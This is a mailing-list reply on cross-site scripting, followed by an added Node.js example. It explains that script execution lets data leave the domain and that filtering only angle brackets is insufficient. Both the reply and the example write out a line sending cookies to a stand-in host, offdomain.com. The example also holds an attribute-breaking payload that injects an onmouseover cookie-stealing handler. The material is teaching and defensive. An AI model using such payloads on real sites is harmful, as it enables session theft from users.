Michael Ungar wrote:

> Okay, I understand that part. Only piece I do not
> fully understand is
>
> A - Assuming one does not allow ActiveX to run on
> their machine, would not the Java sandbox limit
> sending cookie or other data to another site? I
> thought the Java sandbox limits what mobile code can do on
> the computer while ActiveX does not have any such
> limitation,
If JavaScript or JScript or VBScript or anything of that nature can be executed... then data can be sent off domain. Just a little:

    var x = data_to_send;
    window.location = "http://www.offdomain.com/pickup.cgi?" + x;

and that's it.

As a side note.... a site admin should not rely on their users to turn settings off to make sure they are secure when visiting the admin's site.

> B - I've seen literature which says servers should
> block " < > " ' ; ( ) + - " characters. If one has not
> blocked all these types what are the implications
> (i.e., if only <> types are blocked)?

While "<" and ">" are the first necessary step... those other special characters can sometimes be used to modify HTML in other instances. All in all they are just a good idea to filter so users aren't messed with.
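The two points in the reply above (off-domain exfiltration needs nothing more than script execution, and filtering only "<" and ">" leaves other characters to play with), as an added example that is not part of the original thread. It runs under Node.js with no dependencies; the cookie string, the pickup URL and the "profile link" template are constructed for the example, and the check it performs on the rendered markup is a deliberately minimal attribute parser, not a real HTML parser.

```javascript
// Added example (not from the original thread). Node.js, no dependencies.
// Shows (1) the off-domain exfiltration one-liner from the post, with the
// value URL-encoded, and (2) why stripping only '<' and '>' is not enough.

// Constructed stand-in for document.cookie: there is no browser here.
const SAMPLE_COOKIE = "sessionid=abc123; prefs=dark";

// Builds the URL the post's snippet sends the browser to. The data must be
// encoded, or '=', ';' and spaces in a cookie string mangle the query string.
// In a page this would be: window.location = buildExfilUrl(PICKUP, document.cookie);
function buildExfilUrl(pickupUrl, data) {
  return pickupUrl + "?" + encodeURIComponent(data);
}

// Filter 1: only the "first necessary step" from the post.
function stripAngleBrackets(s) {
  return s.replace(/[<>]/g, "");
}

// Filter 2: escape every character the post lists, plus '&' so the escaped
// output cannot itself be read back as an entity.
const ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  ";": "&#59;", "(": "&#40;", ")": "&#41;", "+": "&#43;", "-": "&#45;",
};
function escapeHtml(s) {
  return s.replace(/[&<>"';()+\-]/g, (c) => ESCAPES[c]);
}

// Toy server-side template (hypothetical, not a real app): a user-supplied
// display name lands inside a quoted attribute and in element text.
function renderProfileLink(name, filter) {
  return '<a href="/profile" title="' + filter(name) + '">' + filter(name) + "</a>";
}

// Minimal attribute parser for the first tag: attr="value" pairs only.
function parseOpeningTagAttributes(html) {
  const tag = html.slice(0, html.indexOf(">") + 1);
  const attrs = {};
  const re = /([A-Za-z][\w-]*)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(tag)) !== null) attrs[m[1].toLowerCase()] = m[2];
  return attrs;
}

// True if the rendered tag gained an on* event-handler attribute.
function hasEventHandler(html) {
  return Object.keys(parseOpeningTagAttributes(html)).some((k) => k.startsWith("on"));
}

// Payload with no '<' or '>' at all: it closes the title attribute with '"'
// and adds an event handler that ships document.cookie off-domain.
const PAYLOAD =
  "\" onmouseover=\"location='http://www.offdomain.com/pickup.cgi?'+document.cookie";

console.log("exfil URL:   ", buildExfilUrl("http://www.offdomain.com/pickup.cgi", SAMPLE_COOKIE));
console.log("angle-only:  ", renderProfileLink(PAYLOAD, stripAngleBrackets));
console.log("  handler injected?", hasEventHandler(renderProfileLink(PAYLOAD, stripAngleBrackets)));
console.log("full escape: ", renderProfileLink(PAYLOAD, escapeHtml));
console.log("  handler injected?", hasEventHandler(renderProfileLink(PAYLOAD, escapeHtml)));
```

With `stripAngleBrackets` the payload survives intact and the rendered tag gains an `onmouseover` handler; with `escapeHtml` the quote is turned into `&quot;`, so the title attribute never closes and the same text is inert. The attribute parser is only good enough for this toy template; which characters matter depends on where the value lands (attribute, element text, script, URL), which is the reason the wider list is worth filtering.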